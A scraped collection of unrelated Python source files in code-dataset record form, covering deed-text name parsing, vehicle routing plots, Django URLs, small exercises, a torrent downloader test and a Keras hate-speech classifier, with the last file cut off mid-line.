PutArray(text, z): #the parameter must be a string\n a = str(string.ascii_lowercase) #Alfabeto minusculo\n b = str(string.ascii_uppercase) #Alfabeto maiusculo\n a = fStringAdd(a, \"ãáàâçéèêíìîóòôõúùû\")\n b = fStringAdd(b, \"ÃÁÀÂÇÉÈÊÍÌÎÓÒÔÕÚÙÛ\")\n #print(a)\n #print(b)\n li = [] #Array principal para adição de nomes\n nUltCount = 0\n for x in range (z, len(text)):\n if text[x] in b:\n li.append(text[x])\n nUltCount = len(li)-1\n d = x\n #print(li)\n #print(\"Esta é a ultima letra do texto \", fStringRead(li[nUltCount]))\n #print(\"text[x] \",text[x])\n if fStringRead(li[nUltCount]) in b: #irá adicionar as letras minusculas apenas se a ultima letra adicionada na str for maiuscula\n for k in range (x+1, len(text)): #laço que da continuidade da posição da str\n nUltCount = len(li)-1\n if text[k] != fStringRead(li[nUltCount]):\n if text[k] in b:\n li[nUltCount] = fStringAdd(li[nUltCount], text[k])\n nUltCount = len(li)-1\n for minu in range (len(a)): #laço para montar a palavra adicionando as letras minusculas\n if text[k] == a[minu]:\n li[nUltCount] = fStringAdd(li[nUltCount], text[k])\n nUltCount = len(li)-1\n if text[k] == \" \":\n li[nUltCount] = fStringAdd(li[nUltCount], text[k]) #Adicionar espaço\n nUltCount = len(li)-1\n break #saindo do comando quando encontrar espaço\n if text[k] == \"–\": #Ao chegar aqui significa que chegou ao final de um nome.\n zzz = k\n break \n if text[k] == \"–\":\n #print(\"esta é a variavel z \", z)\n #print(\"este é o array da função \", li)\n #print(\"este será o retorno \", zzz)\n break\n if text[k] == \",\" or text[k] == \"–\":\n break\n #print(\"variavel x \", x)\n zzz = x\n \n return li, zzz\n\ndef fTratNome (array): #Irá manter apenas os dois nomes de acordo com texto da mari\n stringss = array\n if \"faz \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"faz \")], \"\")\n elif \"faz a \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"faz a \")], \"\")\n elif \"faz as \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"faz as \")], \"\")\n elif \"faz à \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"faz à \")], \"\")\n elif \"faz às \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"faz às \")], \"\")\n elif \"faz o \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"faz o \")], \"\")\n elif \"faz os \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"faz os \")], \"\")\n elif \"fazem \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"fazem \")], \"\")\n elif \"fazem o \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"fazem o \")], \"\")\n elif \"fazem os \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"fazem os \")], \"\")\n elif \"fazem a \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"fazem a \")], \"\")\n elif \"fazem as \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"fazem as \")], \"\")\n elif \"fazem à \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"fazem a \")], \"\")\n elif \"fazem às \" in stringss:\n setr = stringss.replace(stringss[:stringss.index(\"fazem as \")], \"\")\n\n setr = setr.replace(\"faz \", \"\")\n setr = setr.replace(\"fazem o \", \"\")\n if \" ao \" in setr:\n setr = setr.replace(\" ao \", \",\")\n elif \" a \" in setr:\n setr = setr.replace(\" a \", \",\")\n elif \" à \" in setr:\n setr = setr.replace(\" à \", \",\")\n if \"no valor de réis\" in setr:\n setr = setr.replace(\"no valor de réis\", \"\")\n return setr\n\n\n #\\\n \n# Driver Function\ntext = [] #Lista com apenas Escrituras\nAN = [] #Lista de códigos --> será processado outro dia.\nliz = [] #lista que trará nomes para serem tratados\naFinalResult = [[],[]] #Lista que irá conter todos os nomes\ntext1 = \"\"\"AN, 1ON, 50, p. 15v; AGCRJ, Códice 42-3-56, p. 128\nData - 1670\nDescrição\nEscritura de venda de chãos que faz Antonio Álvares a Domingos Rodrigues Durões, no valor de 36 réis – com três braças de testada, sitos na rua de Mateus de Freitas, partindo de uma banda com casas de Ana Pinta, sogra dele vendedor e da outra com chãos de Antonio Ferreira da Silva, havidos por legítima de seu [sogro] Antonio Fernandes [Lugo].\n\n\n\nAN, 1ON, 50, p. 65; AGCRJ, Códice 42-3-56, p. 136\nData - 1670\nDescrição\nEscritura de doação de chãos para instituição de patrimônio que fazem o Doutor Francisco da Fonseca [Diniz, médico do presídio do Rio de Janeiro desde 1663 - ABN, 39, p. 102, por alcunha \"o Gadelha\"] e sua mulher Isabel Rangel [de Macedo] ao Licenciado Jorge de Oliveira – com três braças de testada e 12 de quintal, sitos na rua de Aleixo Manoel, o velho, caminho da pabuna, partindo de uma banda com casas do doador e da outra com chãos de quem de direito, [comprados de Eusébio Dias Cardoso e sua mulher Francisca da Costa Homem em 21/11/1653 – 1º Ofício?]\n\n\"\"\"\ntext1 = text1.split(\"\\n\") # irá dividir todo o texto e transformar a string em lista\nfor i in range (len(text1)-1,-1,-1): #Laço para retirar todas as posições desnecessárias\n if text1[i] == '' or text1[i] == 'Descrição':\n del(text1[i])\n opo = i\n opo -= 1 \n if \"Escritura\" in text1[opo]: #Condição que irá adicionar as Escrituras (que tem os nomes) na variável [text]\n text.append(text1[opo])\n \nfor p in range (len(text)):\n try:\n text[p] = text[p].replace(text[p][text[p].index(\"[\"):text[p].index(\"]\")], \"\")\n except ValueError:\n continue\n\n\ncount = 0\nfor i in range (len(text)):\n while count != len(text[i])-1:\n funct = []\n funct.append(PutArray(text[i], count))\n liz.append(funct[0][0][0])\n count = funct[0][1]\n if text[i][count] == \",\" or text[i][count] == \"–\":\n break\n count = 0\ninput(liz)\nfor u in range (len(liz)):\n aFinalResult[0].append(fTratNome(liz[u]))\n aFinalResult[1].append(fTratNome(liz[u]))\nprint(aFinalResult)\n\n\n\n\n","sub_path":"regexReplace.py","file_name":"regexReplace.py","file_ext":"py","file_size_in_byte":7118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"645320614","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport os\nimport numpy as np\nimport torch\nfrom torch.utils.data import DataLoader\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\n\nimport matplotlib\nmatplotlib.rcParams[\"font.sans-serif\"] = [\"SimHei\"]\nfrom geopy.distance import geodesic, great_circle\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib.collections import PatchCollection\nfrom matplotlib.patches import Rectangle\nfrom matplotlib.backends.backend_pdf import PdfPages\n\n\nfrom utils import load_model\nfrom problems import CVRP\n\n\n\n# Code inspired by Google OR Tools plot:\n# https://github.com/google/or-tools/blob/fb12c5ded7423d524fc6c95656a9bdc290a81d4d/examples/python/cvrptw_plot.py\n\ndef discrete_cmap(N, base_cmap=None):\n \"\"\"\n Create an N-bin discrete colormap from the specified input map\n \"\"\"\n # Note that if base_cmap is a string or None, you can simply do\n # return plt.cm.get_cmap(base_cmap, N)\n # The following works for string, None, or a colormap instance:\n\n base = plt.cm.get_cmap(base_cmap)\n color_list = base(np.linspace(0, 1, N))\n cmap_name = base.name + str(N)\n return base.from_list(cmap_name, color_list, N)\n\ndef plot_vehicle_routes(data, route, ax1, markersize=5, visualize_demands=False, demand_scale=1, round_demand=False):\n \"\"\"\n Plot the vehicle routes on matplotlib axis ax1.\n \"\"\"\n \n # route is one sequence, separating different routes with 0 (depot)\n routes = [r[r!=0] for r in np.split(route.cpu().numpy(), np.where(route==0)[0]) if (r != 0).any()]\n depot = data['depot'].cpu().numpy()\n locs = data['loc'].cpu().numpy()\n demands = data['demand'].cpu().numpy() * demand_scale\n capacity = demand_scale # Capacity is always 1\n \n x_dep, y_dep = depot\n ax1.plot(x_dep, y_dep, 'sk', markersize=markersize*4)\n ax1.set_xlabel(\"longitude\")\n ax1.set_ylabel(\"latitude\")\n \n legend = ax1.legend(loc='upper center')\n \n cmap = discrete_cmap(len(routes) + 2, 'nipy_spectral')\n dem_rects = []\n used_rects = []\n cap_rects = []\n qvs = []\n total_dist = 0\n for veh_number, r in enumerate(routes):\n color = cmap(len(routes) - veh_number) # Invert to have in rainbow order\n \n route_demands = demands[r - 1]\n coords = locs[r - 1, :]\n xs, ys = coords.transpose()\n\n total_route_demand = sum(route_demands)\n #assert total_route_demand <= capacity\n if not visualize_demands:\n ax1.plot(xs, ys, 'o', mfc=color, markersize=markersize, markeredgewidth=0.0)\n \n dist = 0\n x_prev, y_prev = x_dep, y_dep\n cum_demand = 0\n for (x, y), d in zip(coords, route_demands):\n dist += great_circle((y, x), (y_prev, x_prev)).km\n # dist += np.sqrt((x - x_prev) ** 2 + (y - y_prev) ** 2)\n \n cap_rects.append(Rectangle((x, y), 0.01, 0.1))\n used_rects.append(Rectangle((x, y), 0.01, 0.1 * total_route_demand / capacity))\n dem_rects.append(Rectangle((x, y + 0.1 * cum_demand / capacity), 0.01, 0.1 * d / capacity))\n \n x_prev, y_prev = x, y\n cum_demand += d\n\n dist += great_circle((y_dep, x_dep), (y_prev, x_prev)).km\n # dist += np.sqrt((x_dep - x_prev) ** 2 + (y_dep - y_prev) ** 2)\n total_dist += dist\n qv = ax1.quiver(\n xs[:-1],\n ys[:-1],\n xs[1:] - xs[:-1],\n ys[1:] - ys[:-1],\n scale_units='xy',\n angles='xy',\n scale=1,\n color=color,\n label='R{}, # {}, d {:.2f}'.format(\n veh_number, \n len(r), \n # int(total_route_demand) if round_demand else total_route_demand,\n # int(capacity) if round_demand else capacity,\n dist\n )\n )\n \n qvs.append(qv)\n \n ax1.set_title('{} routes, total distance {:.2f}'.format(len(routes), total_dist))\n ax1.legend(handles=qvs)\n \n pc_cap = PatchCollection(cap_rects, facecolor='whitesmoke', alpha=1.0, edgecolor='lightgray')\n pc_used = PatchCollection(used_rects, facecolor='lightgray', alpha=1.0, edgecolor='lightgray')\n pc_dem = PatchCollection(dem_rects, facecolor='black', alpha=1.0, edgecolor='black')\n \n if visualize_demands:\n ax1.add_collection(pc_cap)\n ax1.add_collection(pc_used)\n ax1.add_collection(pc_dem)\n return len(routes), total_dist\n\ndef test_custom_data(filename, savename=None, demand=.1):\n assert os.path.splitext(filename)[-1] == '.xlsx'\n df = pd.read_excel(filename)\n normalization = MinMaxScaler()\n dfDescribe = df.describe().loc[[\"min\", \"max\"], [\"longitude\", \"latitude\"]]\n dfDescribe = dfDescribe.T\n dfDescribe[\"span\"] = dfDescribe[\"max\"] - dfDescribe[\"min\"]\n df = normalization.fit_transform(df[[\"longitude\", \"latitude\"]])\n model, _ = load_model('pretrained/cvrp_50/')\n torch.manual_seed(1234)\n\n dataset = CVRP.make_custom_dataset(df, demand=demand)\n # Need a dataloader to batch instances\n dataloader = DataLoader(dataset, batch_size=1000)\n\n # Make var works for dicts\n batch = next(iter(dataloader))\n\n # Run the model\n model.eval()\n model.set_decode_type('greedy')\n with torch.no_grad():\n length, log_p, tours = model(batch, return_pi=True)\n print([0] + list(i.item() for i in tours[0].data) + [0])\n\n # [[0, 22, 28, 24, 23, 21, 0],\n # [0, 17, 29, 26, 25, 18, 19, 20, 1, 0],\n # [0, 9, 7, 6, 11, 14, 15, 8, 12, 2, 0],\n # [0, 10, 16, 27, 13, 5, 3, 4, 0]]\n # Plot the results\n for i, (data, tour) in enumerate(zip(dataset, tours)):\n fig, ax = plt.subplots(figsize=(10, 10))\n data[\"loc\"][:, 0] = dfDescribe.loc[\"longitude\", \"span\"]*data[\"loc\"][:, 0] + dfDescribe.loc[\"longitude\", \"min\"]\n data[\"loc\"][:, 1] = dfDescribe.loc[\"latitude\", \"span\"]*data[\"loc\"][:, 1] + dfDescribe.loc[\"latitude\", \"min\"]\n data[\"depot\"][0] = dfDescribe.loc[\"longitude\", \"span\"]*data[\"depot\"][0] + dfDescribe.loc[\"longitude\", \"min\"]\n data[\"depot\"][1] = dfDescribe.loc[\"latitude\", \"span\"]*data[\"depot\"][1] + dfDescribe.loc[\"latitude\", \"min\"]\n numV, length = plot_vehicle_routes(data, tour, ax, visualize_demands=False, demand_scale=50, round_demand=True)\n\n if savename is not None:\n pdf = PdfPages(\"images//cvrp_\"+savename+\".pdf\")\n pdf.savefig()\n pdf.close()\n # else:\n # plt.show()\n plt.close()\n return numV, length\n\ndef plot_(x, y1, y2, savename=None):\n # plt.rcParams['font.sans-serif'] = ['Microsoft YaHei']\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n ax1.plot(x, y1, 'r', label=\"right\");\n ax1.set_ylabel('充电车数量');\n ax1.set_yticks([3,4,5])\n ax2 = ax1.twinx() # this is the important function\n ax2.plot(x, y2, 'g', label=\"left\")\n ax2.set_ylabel('总路程');\n ax2.set_xlabel('delta');\n ax2.set_ylim([0, 17]);\n\n if savename is not None:\n pdf = PdfPages(\"images//\"+savename+\".pdf\")\n pdf.savefig()\n pdf.close()\n\nif __name__ == '__main__':\n x = np.arange(0.06, 0.16, 0.005)\n ncs = []\n lens = []\n for d in x:\n nc, length = test_custom_data(\"../data/data.xlsx\", demand=d, savename=\"result03_{:.2f}\".format(d))\n ncs.append(nc)\n lens.append(length)\n plot_(x, ncs, lens, \"sensitivity\")\n\n\n","sub_path":"第3场训练赛/charging route planning/attention-learn-to-route-master/plot_vrp.py","file_name":"plot_vrp.py","file_ext":"py","file_size_in_byte":7378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"168125965","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.http import request\nfrom django.views.generic import TemplateView\nfrom tasks import views as tv\n\nurlpatterns = patterns('',\n\n\n url(r'^$', tv.open_tasks, name=\"all_tasks\"),\n url(r'^(?P\\d+)/solutions/$', tv.get_all_solutions, name=\"all_solutions\"),\n url(r'^(?P\\d+)/solutions/(?P\\d+)/$', tv.get_solution, name=\"get_solution\"),\n url(r'^(?P\\d+)/solutions/add/$', tv.add_solution, name=\"add_solution\"),\n url(r'^(?P\\d+)/status/change/(?P\\d+)/$', tv.change_status, name=\"change_status\"),\n url(r'^(?P\\d+)/$', tv.get_task, name=\"get_task\"),\n url(r'^add/$', tv.add_task, name=\"add_task\"),\n url(r'^edit/(?P\\d+)/$', tv.edit_task, name=\"edit_task\"),\n url(r'^delete/(?P\\d+)/$', tv.delete_task, name=\"delete_task\"),\n url(r'^hidden/$', tv.hidden_tasks, name=\"get_hidden_task\"),\n url(r'^language/(?P[^/]+)/$', tv.language_tasks, name=\"tasks_lang\"),\n url(r'^show/$', permission_required('tasks.File')(TemplateView.as_view(template_name='show.html')), name='test'),\n url(r'^show/files/$', tv.show_files, name='files_all'),\n url(r'^show/code/(?P\\d+)/$', tv.show_code, name='get_code'),\n\n\n)","sub_path":"tasks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"651147396","text":"#!/usr/bin/env python3\n#-*- encoding: UTF-8 -*-\n\ndef main():\n try:\n number1 = int(input(\"Informe um número: \"))\n number2 = int(input(\"Informe outro número: \"))\n except:\n print(\"Apenas valores numéricos são aceitos!\")\n \n if(number1 > number2):\n print(f\"{number1} é maior que {number2}. A diferença entre eles é de {number1 - number2}.\")\n elif(number2 > number1):\n print(f\"{number2} é maior que {number1}. A diferença entre eles é de {number2 - number1}.\")\n else:\n print(f\"Números iguais!\")\n\nif(__name__ == \"__main__\"):\n main()\n","sub_path":"Lista 02/Questao7.py","file_name":"Questao7.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"403890982","text":"import tkinter as tk\n\n\ndef main():\n window = tk.Tk()\n tk.Label(window, text=\"Name:\").grid(row=0, column=0, sticky=tk.W)\n ent_name = tk.Entry(window)\n ent_name.grid(row=0, column=1)\n\n tk.Label(window, text=\"Email address: \").grid(row=1, column=0, sticky=tk.W)\n ent_email = tk.Entry(window)\n ent_email.grid(row=1, column=1)\n\n chk_remember = tk.Checkbutton(window, text=\"Remember me...\")\n chk_remember.grid(row=2, column=0, columnspan=2)\n\n btn_submit = tk.Button(window, text=\"Submit\")\n btn_submit.grid(row=2, column=2)\n\n window.mainloop()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Day2/gui3.py","file_name":"gui3.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"424333427","text":"from p7_integration_tests.base_test_case import BaseTestCase\nfrom testfixtures import LogCapture\nimport spynnaker7.pyNN as p\n\n\nclass TestGetWeightsAfterRuns(BaseTestCase):\n\n def test_run(self):\n with LogCapture() as l:\n p.setup()\n p1 = p.Population(1, p.IF_curr_exp, {})\n p2 = p.Population(1, p.IF_curr_exp, {})\n\n proj = p.Projection(p1, p2, p.AllToAllConnector())\n\n p.run(500)\n\n proj.getWeights()\n\n p.run(500)\n\n proj.getWeights()\n\n p.end()\n self.assert_logs_messages(\n l.records, \"Getting weights\", 'INFO', 2)\n\n\nif __name__ == '__main__':\n x = TestGetWeightsAfterRuns()\n x.test_run()\n","sub_path":"p7_integration_tests/get_weights_multi_run/test_get_weights_from_projection_over_multiple_runs.py","file_name":"test_get_weights_from_projection_over_multiple_runs.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"31540441","text":"def main():\n s1 = input(\"first string: \")\n s2 = input(\"second string: \")\n s3 = input(\"third string: \")\n\n words = [s1,s2,s3]\n\n print(\"The strings, by increasing length, are:\")\n\n short = shortest(words)\n for i in range(0,len(short),1):\n print(\" \",short[i])\n\ndef shortest(array):\n s1 = len(array[0])\n s2 = len(array[1])\n s3 = len(array[2])\n\n temp1 = array[0]\n temp2 = array[1]\n temp3 = array[2]\n\n if s1 > s2:\n if s1 > s3:\n if s2 > s3:\n array[2] = temp1\n array[0] = temp3\n else:\n array[2] = temp1\n array[1] = temp3\n array[0] = temp2\n else:\n array[1] = temp1\n array[0] = temp2\n else:\n if s1 > s3:\n array[2] = temp2\n array[1] = temp1\n array[0] = temp3\n\n return array\n\nmain()\n","sub_path":"final/ekahi/stringy.py","file_name":"stringy.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"632295598","text":"def isname(x):\n return x in ['Allen', 'Tom', 'Marvin'];\ndef read_file(x = 'filename'):\n lines = [];\n with open(x, 'r', encoding = 'utf-8-sig') as input:\n for line in input:\n line = line.strip()\n lines.append(line);\n return lines;\ndef convert(lines):\n record = [];\n name = None;\n for line in lines:\n if isname(line):\n name = line;\n continue;\n if name:\n record.append(name + ': '+line); \n return record;\ndef write_file(x, y):\n with open(x, 'w', encoding = 'utf-8-sig') as output:\n for line in y:\n output.write(line + '\\n');\ndef main():\n lines = read_file('input.txt');\n record = convert(lines);\n write_file('output.txt', record);\nmain()","sub_path":"chating_record.py","file_name":"chating_record.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"37050342","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n# @Time : 11/28/2018 09:15\n# @Author : mingfei.net@gmail.com\n# @FileName : step2_table.py\n# @GitHub : https://github.com/thu/Python-Demo-A\n\nimport mysql.connector\n\nconnection = mysql.connector.connect(\n user='root',\n password='system'\n)\n\ncursor = connection.cursor()\n\ncursor.execute('select * from db_python.user')\n\nrows = cursor.fetchall()\n\nfor row in rows:\n print(row)\n\ncursor.execute('''\n select * from db_python.book\n where id < 10\n order by title desc \n limit 5 offset 0\n''')\n\nprint('-----------------------')\n\nrows = cursor.fetchall()\n\nfor row in rows:\n print(row)\n","sub_path":"day08/mysql_test/step4_select.py","file_name":"step4_select.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"628038656","text":"\"\"\"\n题目描述:\n输入一个整型数组,数组里有整数也有负数。\n数组中一个或连续的多个整数组成一个子数组。求所有子数组的和的最大值。\n要求时间复杂度为O(n)。\n\n思路:\n关键的问题在于成功分析整个过程。对于连续子数组,可以用一个数值来存储当前和,如果当前和小于零,\n那么在进行到下一个元素的时候,直接把当前和赋值为下一个元素,如果当前和大于零,则累加下一个元素,\n同时用一个maxNum存储最大值并随时更新。也可以利用动态规划解决。\n\"\"\"\n\nclass Solution:\n def FindGreatestSumOfSubArray(self, array):\n if array == None or len(array) <= 0:\n return 0\n nCurSum = 0\n nGreatestSum = array[0]\n for i in array:\n if nCurSum <= 0:\n nCurSum = i\n else:\n nCurSum += i\n if nCurSum > nGreatestSum:\n nGreatestSum = nCurSum\n return nGreatestSum\n \n # 动态规划\n def FindGreatestSumOfSubArray2(self, array):\n if array == None or len(array) <= 0:\n return 0\n aList = [0] * len(array) \n for i, number in enumerate(array):\n if i == 0 or aList[i-1] <= 0:\n aList[i] = number\n else:\n aList[i] = aList[i-1] + number\n return max(aList) \n \n\nalist = [1, -2, 3, 10, -4, 7, 2, -5]\ns = Solution()\nprint(s.FindGreatestSumOfSubArray(alist))\nprint(s.FindGreatestSumOfSubArray2(alist))","sub_path":"剑指Offer/面试题31.连续子数组的最大和.py","file_name":"面试题31.连续子数组的最大和.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"28067391","text":"true = True\nwhile true == True:\n #Add infomation \n def Add_Info():\n Human = input(\"Who would you like to add info about: \")\n Comand = input(\"What would you like to do: \")\n if Comand == \"Add\":\n Info = input(\"Add in informaiton: \")\n Add = open(Human + \".txt\", \"a\")\n Add.write(Info + \"\\n\")\n Add.close()\n loop = input()\n while loop == \"new\":\n Info = input(\"Add in informaiton: \")\n loop = input()\n Add = open(Human + \".txt\", \"a\")\n Add.write(Info + \"\\n\")\n Add.close()\n if Comand == \"Read\":\n Add = open(Human + \".txt\", \"r\")\n Read_Info = Add.read()\n print(Read_Info)\n Add.close()\n\n\n \n\n #Add the person \n def Add_Person():\n NameOfPerson = input(\"What is the name of the person: \")\n if NameOfPerson == \"skip\":\n Add_Info()\n else:\n Location = input(\"Where is the person from: \")\n Add = open(NameOfPerson + \".txt\", \"w\")\n Add.write(NameOfPerson + \"\\n\")\n Add.write(Location + \"\\n\")\n Add.close()\n Add_Info()\n\n\n\n #Add Person\n Add_Person()\n","sub_path":"AddPerson.py","file_name":"AddPerson.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"429855991","text":"import itertools\n\n__author__ = 'cherry'\nimport threading\nfrom download import LeechTorrent\nfrom get_magnet import GetMagnetLink\n\n\ndef downloadTest():\n\tleech_torrent = LeechTorrent()\n\tget_magnet_link = GetMagnetLink()\n\tleech_torrent.save_path = '/home/cherry/Downloads/torrent/'\n\tmagnet_link = get_magnet_link.getKickass()\n\tfor i in magnet_link:\n\t\tleech_torrent.urlDown(i)\n\n#for i in itertools.izip_longest(*[iter(magnet_link)] * 3):\nif __name__ == '__main__':\n\tdownloadTest()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"423551050","text":"from keras.callbacks import EarlyStopping\nfrom keras_preprocessing import sequence\nimport re\n\nfrom partd import numpy\nimport string\nimport nltk\nimport numpy as np\nimport pandas as pd\nfrom nltk.corpus import stopwords\nfrom nltk.stem import SnowballStemmer, PorterStemmer\nfrom nltk.tokenize import TweetTokenizer\nimport os\n\n\n# Keras\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Flatten, LSTM, Conv1D, MaxPooling1D, Dropout, Activation, Embedding, GRU, Input, \\\n Bidirectional, SpatialDropout1D\nfrom keras.layers.embeddings import Embedding\nfrom keras.regularizers import l2\nfrom keras.utils import np_utils, to_categorical\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.metrics import precision_score, recall_score, roc_auc_score, f1_score, classification_report\nfrom sklearn.model_selection import train_test_split\n \n \ndef removeStopwords(tweets):\n stopwords = nltk.corpus.stopwords.words(\"english\")\n # stops.update(['.',',','\"',\"'\",'?',':',';','(',')','[',']','{','}'])\n tokens = [tok for tok in tweets if not tok in stopwords]\n return tokens\n \n \n \ndef removeURL(tweets):\n # newText = re.sub('http\\\\S+', '', tweets, flags=re.MULTILINE)\n space_pattern = '\\s+'\n giant_url_regex = ('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|'\n '[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')\n # mention_regex = '@[\\w\\-]+'\n parsed_text = re.sub(space_pattern, ' ', tweets)\n parsed_text = re.sub(giant_url_regex, 'URLHERE', parsed_text)\n # parsed_text = re.sub(mention_regex, 'MENTIONHERE', parsed_text)\n return parsed_text\n\ndef removeNumber(tweets):\n newText = re.sub('\\\\d+', '', tweets)\n return newText\n\ndef removeHashtags(tokens):\n toks = [ tok for tok in tokens if tok[0] != '#']\n# if segment == True:\n# segTool = Analyzer('en')\n# for i, tag in enumerate(self.hashtags):\n# text = tag.lstrip('#')\n# segmented = segTool.segment(text)\n\n return toks\n\ndef removePunctuation (tweets):\n translator = str.maketrans('', '', string.punctuation)\n return tweets.translate(translator)\n\n\ndef stemTweet(tokens):\n stemmer = SnowballStemmer('english')\n stemmed_words = [stemmer.stem(word) for word in tokens]\n return stemmed_words\n\n# In[32]:\n\n\ndef preprocess(tweet, remove_punctuation = True, remove_stopwords = False, remove_url = True, remove_hashtags = False, remove_number = True, stem_tweet = False):\n# text = tweet.translate(string.punctuation) -> to figure out what it does ?\n \"\"\"\n Tokenize the tweet text using TweetTokenizer.\n set strip_handles = True to Twitter username handles.\n set reduce_len = True to replace repeated character sequences of length 3 or greater with sequences of length 3.\n \"\"\"\n if remove_punctuation:\n tweet = removePunctuation(tweet)\n if remove_url:\n tweet = removeURL(tweet)\n twtk = TweetTokenizer(strip_handles=True, reduce_len=True)\n if remove_number:\n tweet = removeNumber(tweet)\n tokens = [w.lower() for w in twtk.tokenize(tweet) if w != \"\" and w is not None]\n if remove_hashtags:\n tokens = removeHashtags(tokens)\n if remove_stopwords:\n tokens = removeStopwords(tokens)\n if stem_tweet:\n tokens = stemTweet(tokens)\n text = \" \".join(tokens)\n return text\n\ndf = pd.read_csv('hateval2019-dataset/hateval2019_en_train.csv', quotechar=\"\\\"\", encoding='utf-8')\n# df = pd.read_csv('gdrive/My Drive/GMU/hatEval-2019/public_development_en/hateval2019_en_train.csv', quotechar=\"\\\"\", encoding='utf-8')\n# df = df.dropna()\n# df = df.loc[df['HS'] == 1]\ndf['text'] = df['text'].map(lambda x: preprocess(x, remove_stopwords=True, remove_hashtags=False, remove_number= True, remove_url=True, stem_tweet=False))\ny_train = to_categorical(df['HS'])\n\ndf1 = pd.read_csv('hateval2019-dataset/hateval2019_en_test.csv', quotechar=\"\\\"\", encoding='utf-8')\n# df1 = df1.dropna()\n# df1 = df1.loc[df1['HS'] == 1]\ndf1['text'] = df1['text'].map(lambda x: preprocess(x, remove_stopwords=True, remove_hashtags=False, remove_number= True, remove_url=True, stem_tweet=False))\ny_test = to_categorical(df1['HS'])\n\n\n\n# The maximum number of words to be used. (most frequent)\nMAX_NUMBER_WORDS = 50000\n# Max number of words in each complaint.\nMAX_SEQUENCE_LENGTH = 140\n# This is fixed.\nEMBEDDING_DIM = 100\n\n\ntokenizer = Tokenizer(num_words=MAX_NUMBER_WORDS, filters='!\"$%&()*+,-./:;<=>?@[\\]^_`{|}~', lower=True)\ntokenizer.fit_on_texts(df['text'].values)\nword_index = tokenizer.word_index\nprint('Found %s unique tokens.' % len(word_index))\n\ntokenizer = Tokenizer(num_words=MAX_NUMBER_WORDS, filters='!\"$%&()*+,-./:;<=>?@[\\]^_`{|}~', lower=True)\ntokenizer.fit_on_texts(df1['text'].values)\nword_index = tokenizer.word_index\nprint('Found %s unique tokens.' % len(word_index))\n\n\n\nX_train = tokenizer.texts_to_sequences(df['text'].values)\nX_train = pad_sequences(X_train, maxlen=MAX_SEQUENCE_LENGTH)\nprint('Shape of train data tensor:', X_train.shape, y_train.shape)\n\nX_test = tokenizer.texts_to_sequences(df1['text'].values)\nX_test = pad_sequences(X_test, maxlen=MAX_SEQUENCE_LENGTH)\nprint('Shape of test data tensor:', X_test.shape, y_test.shape)\n\n\n\n################### model building###################3\nmodel = Sequential()\nmodel.add(Embedding(MAX_NUMBER_WORDS, EMBEDDING_DIM, input_length=X_train.shape[1]))\nmodel.add(SpatialDropout1D(0.2))\nmodel.add(Bidirectional(GRU(100, dropout=0.2, recurrent_dropout=0.2)))\nmodel.add(Dense (64, activation='relu'))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(32, activation='relu'))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(2, activation='softmax'))\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\nprint (model.summary())\nepochs = 15\nbatch_size = 64\n\nhistory = model.fit(X_train, y_train, epochs=epochs, batch_size=batch_size,validation_split=0.1, callbacks=[EarlyStopping(monitor='val_loss', patience=3, min_delta=0.0001)])\n\ny_predict = model.predict(X_test, batch_size=None, 